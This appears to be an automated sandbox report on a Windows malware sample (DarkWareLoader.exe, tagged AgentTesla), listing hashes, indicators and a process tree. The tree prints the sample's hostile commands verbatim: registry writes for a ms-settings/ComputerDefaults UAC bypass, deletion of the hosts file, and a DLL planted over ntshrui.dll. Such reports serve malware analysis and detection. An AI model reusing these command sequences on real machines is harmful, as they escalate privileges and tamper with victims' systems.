Analysis
-
max time kernel
234s -
max time network
295s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
31/08/2024, 16:33
Static task
static1
Behavioral task
behavioral1
Sample
DarkWareLoader.exe
Resource
win10v2004-20240802-en
General
-
Target
DarkWareLoader.exe
-
Size
2.3MB
-
MD5
c42b185841679c16a7aed9ccf48e0d0d
-
SHA1
0c6ad1cc0e6e8706c5913a8604d42449549c4da3
-
SHA256
03bb14890ec3a3cdf397f6af5e87d4cdf122b564a64f89c5b6672e5cbcc57b01
-
SHA512
c8ce057772905b620a9ea1910ce72410d49b327ce5256a6cf594d4a1df17bb3eed4a2b6664988c755b58ec31ee6e76ba87230edeb56c574e3b8bd0ff5c63135f
-
SSDEEP
49152:4CI01yYHlo9MayICF/Xo1U7AZecga2jp:4CIAyYFS8w3UJd
Malware Config
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
AgentTesla payload 3 IoCs
resource yara_rule behavioral1/memory/932-34-0x0000000006A20000-0x0000000006C32000-memory.dmp family_agenttesla behavioral1/memory/932-34-0x0000000006A20000-0x0000000006C32000-memory.dmp family_agenttesla behavioral1/memory/932-34-0x0000000006A20000-0x0000000006C32000-memory.dmp family_agenttesla -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation DarkWare.exe Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation DarkWareLoader.exe -
Executes dropped EXE 9 IoCs
pid Process 3204 concv1.exe 932 DarkWare.exe 3968 CuteCats.jpeg 3204 concv1.exe 932 DarkWare.exe 3968 CuteCats.jpeg 3204 concv1.exe 932 DarkWare.exe 3968 CuteCats.jpeg -
pid Process 3840 powershell.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 30 raw.githubusercontent.com 31 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 61 checkip.amazonaws.com -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 408 cmd.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
pid Process 3968 CuteCats.jpeg 3968 CuteCats.jpeg 3968 CuteCats.jpeg 3968 CuteCats.jpeg 3968 CuteCats.jpeg 3968 CuteCats.jpeg -
Drops file in Windows directory 7 IoCs
description ioc Process File created C:\Windows\123r.zip DarkWare.exe File opened for modification C:\Windows\ntshrui.dll attrib.exe File created C:\Windows\Fonts\BEATTECH.ttf DarkWare.exe File created C:\Windows\Fonts DarkWare.exe File created C:\Windows\1.txt DarkWare.exe File created C:\Windows\bet.rar DarkWare.exe File created C:\Windows\41242e.txt DarkWare.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NOTEPAD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NOTEPAD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DarkWare.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 dllhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dllhost.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion DarkWare.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS DarkWare.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer DarkWare.exe -
Modifies registry class 58 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\597538.vbs" reg.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell reg.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell\Open reg.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings OpenWith.exe Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\575174.vbs" reg.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell\Open reg.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell reg.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell reg.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell\Open\command reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell reg.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell\Open reg.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings DarkWare.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings OpenWith.exe Key deleted \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell\Open reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\711676.vbs" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\236067.vbs" reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\326390.vbs" reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell reg.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell\Open reg.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell reg.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell\Open\command reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell\Open reg.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell\Open reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell\Open reg.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell\Open reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\ms-settings\Shell\Open reg.exe -
Opens file in notepad (likely ransom note) 3 IoCs
pid Process 2428 NOTEPAD.EXE 456 NOTEPAD.EXE 3464 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3840 powershell.exe 3840 powershell.exe 3840 powershell.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 3968 CuteCats.jpeg 3968 CuteCats.jpeg 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe 2268 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 6 IoCs
pid Process 4148 OpenWith.exe 4948 OpenWith.exe 4148 OpenWith.exe 4948 OpenWith.exe 4148 OpenWith.exe 4948 OpenWith.exe -
Suspicious behavior: LoadsDriver 6 IoCs
pid Process 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3180 DarkWareLoader.exe Token: SeDebugPrivilege 932 DarkWare.exe Token: SeDebugPrivilege 3840 powershell.exe Token: SeIncreaseQuotaPrivilege 3840 powershell.exe Token: SeSecurityPrivilege 3840 powershell.exe Token: SeTakeOwnershipPrivilege 3840 powershell.exe Token: SeLoadDriverPrivilege 3840 powershell.exe Token: SeSystemProfilePrivilege 3840 powershell.exe Token: SeSystemtimePrivilege 3840 powershell.exe Token: SeProfSingleProcessPrivilege 3840 powershell.exe Token: SeIncBasePriorityPrivilege 3840 powershell.exe Token: SeCreatePagefilePrivilege 3840 powershell.exe Token: SeBackupPrivilege 3840 powershell.exe Token: SeRestorePrivilege 3840 powershell.exe Token: SeShutdownPrivilege 3840 powershell.exe Token: SeDebugPrivilege 3840 powershell.exe Token: SeSystemEnvironmentPrivilege 3840 powershell.exe Token: SeRemoteShutdownPrivilege 3840 powershell.exe Token: SeUndockPrivilege 3840 powershell.exe Token: SeManageVolumePrivilege 3840 powershell.exe Token: 33 3840 powershell.exe Token: 34 3840 powershell.exe Token: 35 3840 powershell.exe Token: 36 3840 powershell.exe Token: SeIncreaseQuotaPrivilege 4784 wmic.exe Token: SeSecurityPrivilege 4784 wmic.exe Token: SeTakeOwnershipPrivilege 4784 wmic.exe Token: SeLoadDriverPrivilege 4784 wmic.exe Token: SeSystemProfilePrivilege 4784 wmic.exe Token: SeSystemtimePrivilege 4784 wmic.exe Token: SeProfSingleProcessPrivilege 4784 wmic.exe Token: SeIncBasePriorityPrivilege 4784 wmic.exe Token: SeCreatePagefilePrivilege 4784 wmic.exe Token: SeBackupPrivilege 4784 wmic.exe Token: SeRestorePrivilege 4784 wmic.exe Token: SeShutdownPrivilege 4784 wmic.exe Token: SeDebugPrivilege 4784 wmic.exe Token: SeSystemEnvironmentPrivilege 4784 wmic.exe Token: SeRemoteShutdownPrivilege 4784 wmic.exe Token: SeUndockPrivilege 4784 wmic.exe Token: SeManageVolumePrivilege 4784 wmic.exe Token: 33 4784 wmic.exe Token: 34 4784 wmic.exe Token: 35 4784 wmic.exe Token: 36 4784 wmic.exe Token: SeIncreaseQuotaPrivilege 4784 wmic.exe Token: SeSecurityPrivilege 4784 wmic.exe Token: SeTakeOwnershipPrivilege 4784 wmic.exe Token: SeLoadDriverPrivilege 4784 wmic.exe Token: SeSystemProfilePrivilege 4784 wmic.exe Token: SeSystemtimePrivilege 4784 wmic.exe Token: SeProfSingleProcessPrivilege 4784 wmic.exe Token: SeIncBasePriorityPrivilege 4784 wmic.exe Token: SeCreatePagefilePrivilege 4784 wmic.exe Token: SeBackupPrivilege 4784 wmic.exe Token: SeRestorePrivilege 4784 wmic.exe Token: SeShutdownPrivilege 4784 wmic.exe Token: SeDebugPrivilege 4784 wmic.exe Token: SeSystemEnvironmentPrivilege 4784 wmic.exe Token: SeRemoteShutdownPrivilege 4784 wmic.exe Token: SeUndockPrivilege 4784 wmic.exe Token: SeManageVolumePrivilege 4784 wmic.exe Token: 33 4784 wmic.exe Token: 34 4784 wmic.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 932 DarkWare.exe 932 DarkWare.exe 932 DarkWare.exe -
Suspicious use of SetWindowsHookEx 64 IoCs
pid Process 2268 dllhost.exe 4148 OpenWith.exe 4148 OpenWith.exe 4148 OpenWith.exe 4148 OpenWith.exe 4148 OpenWith.exe 4148 OpenWith.exe 4148 OpenWith.exe 4148 OpenWith.exe 4148 OpenWith.exe 4148 OpenWith.exe 4148 OpenWith.exe 4148 OpenWith.exe 4148 OpenWith.exe 4148 OpenWith.exe 4148 OpenWith.exe 4148 OpenWith.exe 4148 OpenWith.exe 4148 OpenWith.exe 4148 OpenWith.exe 4148 OpenWith.exe 4148 OpenWith.exe 4148 OpenWith.exe 4148 OpenWith.exe 4148 OpenWith.exe 4148 OpenWith.exe 4148 OpenWith.exe 4148 OpenWith.exe 4148 OpenWith.exe 4148 OpenWith.exe 4148 OpenWith.exe 4148 OpenWith.exe 4148 OpenWith.exe 4148 OpenWith.exe 4948 OpenWith.exe 4948 OpenWith.exe 4948 OpenWith.exe 4948 OpenWith.exe 4948 OpenWith.exe 4948 OpenWith.exe 4948 OpenWith.exe 4948 OpenWith.exe 4948 OpenWith.exe 4948 OpenWith.exe 4948 OpenWith.exe 4948 OpenWith.exe 4948 OpenWith.exe 4948 OpenWith.exe 4948 OpenWith.exe 4948 OpenWith.exe 4948 OpenWith.exe 4948 OpenWith.exe 4948 OpenWith.exe 4948 OpenWith.exe 4948 OpenWith.exe 4948 OpenWith.exe 4948 OpenWith.exe 4948 OpenWith.exe 4948 OpenWith.exe 4948 OpenWith.exe 4948 OpenWith.exe 4948 OpenWith.exe 4948 OpenWith.exe 4948 OpenWith.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3180 wrote to memory of 3204 3180 DarkWareLoader.exe 85 PID 3180 wrote to memory of 3204 3180 DarkWareLoader.exe 85 PID 3180 wrote to memory of 932 3180 DarkWareLoader.exe 86 PID 3180 wrote to memory of 932 3180 DarkWareLoader.exe 86 PID 3180 wrote to memory of 932 3180 DarkWareLoader.exe 86 PID 3204 wrote to memory of 3984 3204 concv1.exe 92 PID 3204 wrote to memory of 3984 3204 concv1.exe 92 PID 3984 wrote to memory of 2944 3984 cmd.exe 94 PID 3984 wrote to memory of 2944 3984 cmd.exe 94 PID 3204 wrote to memory of 2304 3204 concv1.exe 97 PID 3204 wrote to memory of 2304 3204 concv1.exe 97 PID 2304 wrote to memory of 2180 2304 cmd.exe 99 PID 2304 wrote to memory of 2180 2304 cmd.exe 99 PID 2304 wrote to memory of 3000 2304 cmd.exe 100 PID 2304 wrote to memory of 3000 2304 cmd.exe 100 PID 3204 wrote to memory of 224 3204 concv1.exe 101 PID 3204 wrote to memory of 224 3204 concv1.exe 101 PID 224 wrote to memory of 2440 224 cmd.exe 103 PID 224 wrote to memory of 2440 224 cmd.exe 103 PID 2440 wrote to memory of 3964 2440 ComputerDefaults.exe 104 PID 2440 wrote to memory of 3964 2440 ComputerDefaults.exe 104 PID 3964 wrote to memory of 1844 3964 wscript.exe 105 PID 3964 wrote to memory of 1844 3964 wscript.exe 105 PID 3204 wrote to memory of 4148 3204 concv1.exe 107 PID 3204 wrote to memory of 4148 3204 concv1.exe 107 PID 3204 wrote to memory of 4264 3204 concv1.exe 109 PID 3204 wrote to memory of 4264 3204 concv1.exe 109 PID 4264 wrote to memory of 5024 4264 cmd.exe 111 PID 4264 wrote to memory of 5024 4264 cmd.exe 111 PID 3204 wrote to memory of 2268 3204 concv1.exe 115 PID 3204 wrote to memory of 2268 3204 concv1.exe 115 PID 3204 wrote to memory of 2268 3204 concv1.exe 115 PID 3204 wrote to memory of 2268 3204 concv1.exe 115 PID 3204 wrote to memory of 2268 3204 concv1.exe 115 PID 3204 wrote to memory of 2268 3204 concv1.exe 115 PID 3204 wrote to memory of 2268 3204 concv1.exe 115 PID 3204 wrote to memory of 2268 3204 concv1.exe 115 PID 3204 wrote to memory of 2268 3204 concv1.exe 115 PID 3204 wrote to memory of 2268 3204 concv1.exe 115 PID 3204 wrote to memory of 2268 3204 concv1.exe 115 PID 2268 wrote to memory of 4368 2268 dllhost.exe 116 PID 2268 wrote to memory of 4368 2268 dllhost.exe 116 PID 4368 wrote to memory of 3272 4368 cmd.exe 118 PID 4368 wrote to memory of 3272 4368 cmd.exe 118 PID 2268 wrote to memory of 4836 2268 dllhost.exe 119 PID 2268 wrote to memory of 4836 2268 dllhost.exe 119 PID 4836 wrote to memory of 4372 4836 cmd.exe 121 PID 4836 wrote to memory of 4372 4836 cmd.exe 121 PID 4836 wrote to memory of 3140 4836 cmd.exe 122 PID 4836 wrote to memory of 3140 4836 cmd.exe 122 PID 2268 wrote to memory of 3368 2268 dllhost.exe 123 PID 2268 wrote to memory of 3368 2268 dllhost.exe 123 PID 3368 wrote to memory of 3948 3368 cmd.exe 125 PID 3368 wrote to memory of 3948 3368 cmd.exe 125 PID 3948 wrote to memory of 1344 3948 ComputerDefaults.exe 126 PID 3948 wrote to memory of 1344 3948 ComputerDefaults.exe 126 PID 1344 wrote to memory of 3968 1344 wscript.exe 127 PID 1344 wrote to memory of 3968 1344 wscript.exe 127 PID 2268 wrote to memory of 4056 2268 dllhost.exe 129 PID 2268 wrote to memory of 4056 2268 dllhost.exe 129 PID 2268 wrote to memory of 1240 2268 dllhost.exe 131 PID 2268 wrote to memory of 1240 2268 dllhost.exe 131 PID 1240 wrote to memory of 316 1240 cmd.exe 133 PID 1240 wrote to memory of 316 1240 cmd.exe 133 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 452 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\DarkWareLoader.exe"C:\Users\Admin\AppData\Local\Temp\DarkWareLoader.exe"1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3180 -
C:\Users\Admin\AppData\Local\Temp\concv1.exe"C:\Users\Admin\AppData\Local\Temp\concv1.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3204 -
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f3⤵
- Suspicious use of WriteProcessMemory
PID:3984 -
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:2944
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\236067.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f3⤵
- Suspicious use of WriteProcessMemory
PID:2304 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\236067.vbs" /f4⤵
- Modifies registry class
PID:2180
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵
- Modifies registry class
PID:3000
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe3⤵
- Suspicious use of WriteProcessMemory
PID:224 -
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2440 -
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\236067.vbs5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3964 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts6⤵PID:1844
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\236067.vbs3⤵PID:4148
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f3⤵
- Suspicious use of WriteProcessMemory
PID:4264 -
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵
- Modifies registry class
PID:5024
-
-
-
C:\Windows\System32\dllhost.exe"C:\Windows\System32\dllhost.exe"3⤵
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2268 -
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵
- Suspicious use of WriteProcessMemory
PID:4368 -
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵PID:3272
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\597538.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵
- Suspicious use of WriteProcessMemory
PID:4836 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\597538.vbs" /f5⤵
- Modifies registry class
PID:4372
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f5⤵
- Modifies registry class
PID:3140
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3368 -
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe5⤵
- Suspicious use of WriteProcessMemory
PID:3948 -
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\597538.vbs6⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1344 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c move "C:\Users\Admin\AppData\Local\Temp\0347873.tmp" "C:\Windows\ntshrui.dll"7⤵PID:3968
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\597538.vbs4⤵PID:4056
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵
- Suspicious use of WriteProcessMemory
PID:1240 -
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵
- Modifies registry class
PID:316
-
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:1012
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵PID:4264
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\575174.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵PID:4576
-
